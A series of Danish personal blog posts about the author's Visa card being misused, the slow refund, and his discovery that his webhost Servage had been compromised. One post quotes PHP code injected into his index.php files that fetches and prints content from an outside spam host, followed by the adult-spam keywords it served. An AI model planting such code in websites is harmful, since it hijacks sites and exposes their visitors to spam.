I gennem den seneste måneds tid har jeg haft travlt stort set hver dag. Så snart Sigurd var blevet lagt til at sove om aftenen, så blev den bærbare tændt så jeg kunne arbejde videre på et projekt jeg skal lave. I dag er forhåbentlig sidste dag hvor jeg skal sidde om aftenen og arbejde på det projekt, da det i morgen bliver overdraget til anden side. Derefter er det kun fejlrettelser og support, som forhåbentlig bliver overskueligt.

Det jeg prøver på at skrive er, at jeg har fået negligeret alt for meget den seneste måned.

• Hygge med Sigurd og Karen-Marie (ikke nødvendigvis i den rækkefølge )
• Filmaftenerne med Kim og Rasmus
• FRES™ (FyRaftEnSøl)
• Min efterhånden konstante brok over Servage
• Opdatering af billedalbumet så familien har en chance for at se Sigurd

I dag er første dag på to ugers ferie, så forhåbentlig bliver der tid til at arbejde på alle ovenstående punkter.

Som en direkte konsekvens af, at mit VISA-kort blev misbrugt, så står der også en server-flytning i vente. Nogle af vores sites er allerede flyttet, men kamajole.dk mangler stadig. Desværre så ligger der her en hel del data og databaser som skal flyttes med og det kræver en pæn del koordination. Det kommer helt sikkert til at betyde, at siden vil være nede i noget tid, samt at nogle af områderne vil være ude af funktion.

På den anden side, så kommer det også til at betyde, at…:

• Der kommer et nyt design på blog'en (det gamle mangler funktionalitet, er for smalt og generelt for gammelt )
• Der bliver installeret et helt nyt og forhåbentlig bedre billedalbum
• Alt ligger på egen dedikeret server, så alle sites'ne burde blive superhurtige

Så med andre ord… Nu hvor jeg er færdig med noget arbejde, så kommer der blot noget ande .

Tags: billedalbum,blog,filmaften,server,svindel,vennerne
Categories: blog
No Comments »

I går fik jeg endelig et brev om, at pengene "jeg" havde brugt til at spille for hos Unibet, var blevet ført tilbage på min konto.

Posteringsdato : 01.09.2008
Beløb : 7.687,50
Tekst : VISA-NOTA DKK 7687,50 30.06

Det er præcis samme beløb, så der er ikke gået noget tabt (eller tjent) på valutakursen, som jeg har fået meldinger om fra andre.

Hvorom alting er, så har det altså taget to måneder for PBS, om at få pengene tilbage…

Det er i øvrigt kun lidt længere tid end det tager Yousee at flytte et fastnetnummer. Til gengæld kan jeg bestille en vare i USA og have varen et par dage senere Well… det var blot lige et surt opstød fra en en bitter person, der undrer sig over nogle firmaers arbejdsprocesser en gang imellem .

Tags: pbs,svindel,unibet,visa,yousee
Categories: blog
2 Comments »

Min søster skrev til mig her til aften om, at TV2 har skrevet noget på Tekst-TV omkring visakort-svindel i Tyskland. Det har jeg selvfølgelig undersøgt nærmere nu og minsandten om ikke et par af vores medier har skrevet om det.

TV2 har følgende artikel: Visa-kort i fare efter datatyveri

Politiken har denne artikel: Visakort-informationer stjålet

Det som jeg synes er yderst bemærkelsesværdigt er, at Søren Winge, pressechef for PBS, udtaler sig til Politiken, hvor han siger: "… at de endnu ikke hos PBS har været tvunget til at lukke nogle kort" . Jeg skal ikke kunne sige, hvad PBS's definition af "tvunget til at lukke nogle kort" er, men et eller andet sted synes jeg, at når mit kort blev spæret for online handel (pga. at det triggerede en early warning hos PBS), så var det ikke noget jeg bestemte. Kortet blev spærret for internethandler (ved halv et tiden om natten) og jeg blev ringet op af min egen "bank" ved middagstid, hvor jeg blev spurgt om jeg kendte til transaktionerne. Da jeg ikke ville kendes ved disse, så blev kortet helt spærret. Om det så var tvunget eller ej, det ved jeg ikke… Jeg var og er selvfølgelig glad for, at det blev spærret – det benægter jeg ikke… Men jeg synes nu ikke at Søren Winges udtalelse er heeelt korrekt.

Jeg vil ikke mene, at jeg er paranoid af natur og har mit visakort låst inde i en pengeboks, når jeg ikke bruger. Jeg vil også mene, at jeg har pænt styr på trojanske heste, keyloggers, spyware og andet "ondt" software, som intetanende ved et uheld kan få installeret på sin computer. Faktisk synes jeg, at jeg bruger mit kort med omtanke og har styr på de sikkerhedsmæssige aspekter både omkring omgang med visakortet og omkring ovennævnte software… og alligevel bliver mit visakort misbrugt!

Det er præcis sådan noget at "nogle" ikke vil have frem i medierne, da det kan få almindelige borgere til at blive bange for at handle online.. og med god grund. Jeg vil ikke male fanden på væggen, for det er trods alt første gang det sker for mig, til trods for at jeg har handlet online i adskillige år, såvel nationalt som internationalt. Der hvor problemet opstår og som jeg mener der skal slås ned på fra offentlig side, er hvor firmaer gemmer ens kortoplysninger og så automatisk trækker på kortet hver gang der skal betales noget. Dette er netop tilfældet ved servage.net, som er problemet i mit tilfælde (alt peger i hvert fald i den retning).

Desværre så findes der også danske firmaer (i hvert fald et som jeg har kendskab til), som bruger denne metode og det er endda den eneste metode man kan betale regninger på, til trods for at firmaet har en fysisk "butik". Jeg har dog kun haft gode erfaringer med dette firma, derfor vil jeg ikke hænge dem ud her. Deres sikkerhed virker også helt i top, så jeg har heller ingen betænkeligheder med at bruge dem igen.

Essensen af det hele er… Ja, hvad er den egentlig?

Brug dit kort med omtankte og prøv at undgå firmaer, hvor man aflevere kortoplsyninger direkte til firmaet og ikke til en officiel betalingsside, som er det mest normale. Jeg ved at vi har strenge krav til lagring af den slags oplysninger i Danmark, men i andre lande kan der være andre regler. Så når serverene er gennemhullede som en si ligesom hos servage.net, så er det altså mega nitten, at ens kortoplysninger ligger i deres database

Tags: fraud,hacked,hacker,hackning,host,pbs,politiken,servage,svindel,tv2,visa,webhost
Categories: blog
Comments Off

Så er vi kommet noget videre i sagen. Frank som har skrevet en kommentar spottede meget sent i nat, at vi begge bruger Servage som webhost og det var faktisk bare det stikord der skulle til. Efter en del googling og analysering af filer på mine sites, så er der nu ingen tvivl om, at jeg er blevet hacked (det samme gælder for Frank). Well, faktisk er det ikke 100% sikkert, at det er os der er blevet hacked – det er mere sandsynligt at det er selve serveren, hvor vi har vores domæner liggende.

Logger man ind i Servage kontrolpanel, så kan man ikke selv se sit indtastede kortnummer (kun de fire sidste cifre), så det er ikke den vej hackerne har fået adgang. Det bestyrke også mistanken om, at det er selve serveren der er blevet hacked og at "de" derfor har haft adgang til meget mere følsom data.

Ydermere så har Servage forbedret deres sikkerhed, ved dels at have ændret reglerne omkring passwords og dels ved at have installeret et såkaldt CAPTCHA-system d. 21. juni 2008. Begge forbedringer er sket relativt kort efter, at der har været meldinger om, at Servage igen er blevet hacked.

En anden "sjov" ting er, at jeg ringede til politiet (Station Amager) for at høre noget omkring en anmeldelse af det hele (vel at mærke før jeg vidst, at der var tale om Servage). Personen jeg talte med kunne ikke lige umiddelbart fortælle om det var noget jeg kunne anmelde eller om det var noget som skulle ske gennem banken. Han ringede derfor tilbage lidt senere og fortalte, at såfremt jeg ikke fysisk havde mistet mit kort, så var det ikke noget jeg kunne anmelde. Så det er op til min bank/PBS at gå videre den vej, hvis de vil det.

Frank har også ringet til politiet (Station City) og her fik de at vide, at det da helt klart kan (og skal) anmeldes – længere er den sag ikke.

Såeh… Er der virkelig så meget forskel i uddannelsen af Danmarks politi på Amager og på Halmtorvet?

En lille liste over hvad jeg lige umiddelbart kunne finde omkring dette:

15. februar 2008: Ændrede filer på Servage

7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection

26. marts 2008: Today I ended my Servage problems

18. maj 2008: Servage got hacked again

30. maj 2008: GoodBye Servage!

21. juni 2008: Servage angrebet – tjek dine index.php filer

Var der nogen der sagde ny webhost?

Mine index.php-filer er blevet ændret på to måder. Den ene er en total erstatnig af filen til:

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?767");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?767")); }
if($r) print $r;

… som henter nedenstående information:

anna nicole smith sex video free online 
sex video download free 
free long play sex video clip shaven pussey foam shaving 
free online indian sex video 
free sex video chat no credit card 
cell phone sex video 
free download sex video clips from free web sites 
free video download pinay assumption sex scandal video 
free adult sex chat online video 
free sex game video 
free online sex video bbs 

Heldigvis havde det site hvor ovenstående index.php-fil blev lavet også en default.php-fil, som indeholdte den rigtige startside. Der er med andre ord ikke gået noget kode tabt.

Den anden er en tilføjelse af links til den eksisterende index.php-fil:

...... .... ..... .. ....
......... ..... ......
... ...... ......... ......... ........
......... ........ ...... ......
...
.......... ..... .......
..... ..... .......

Listen er kortet betydeligt ned og linksne variere fra index.php-fil til index.php-fil.

I begge tilfælde er det relativt harmløst – faktisk er der blot indsat nogle links, som andre person ikke engang kan se. Spørgsmålet er bare, hvad har de ellers fået fat i følsomme data? Egentlig behøver der ikke være tale om en og samme person! Som der åbenbart ser ud, så er Servage hullet som en si, så det er jo nærmest gud og hver mand, der kan skaffe sig adgang til serverne.

Tags: fraud,hacked,hacker,hackning,host,index.php,injection,politi,servage,svindel,webhost
Categories: blog
9 Comments »

Nu har jeg fundet ud af, hvad det var jeg egentlig lavede natten til tirsdag. Der var simpelthen tale om, at jeg tidligt på natten stod op og gamblede lidt på Unibet:

Beløb                  : -7.687,50
Tekst                  : UNIBET
Evt. supplerende tekst : UNIBET
LONDON
VISA-NOTA DKK  7687,50 30.06

Så ved jeg ikke rigtig om det var for at fejrer en gevinst eller noget andet som gjorde, at jeg fik lyst til at bestille nogle blomster to minutter senere… i Sverige…

Beløb                  : 310,60
Tekst                  : WWW.INTERFLORA.SE
Evt. supplerende tekst : WWW.INTERFLORA.SE
BROMMA
VISA-NOTA SEK   390,00 01.07

Blomsterne er dog fint annulleret igen og beløbet indbetalt på min konto. I morgen må jeg så se, hvad der skal ske med de 7.687,50, som jeg ikke just mener jeg har spillet op.

Tags: blog,svindel
Categories: blog
6 Comments »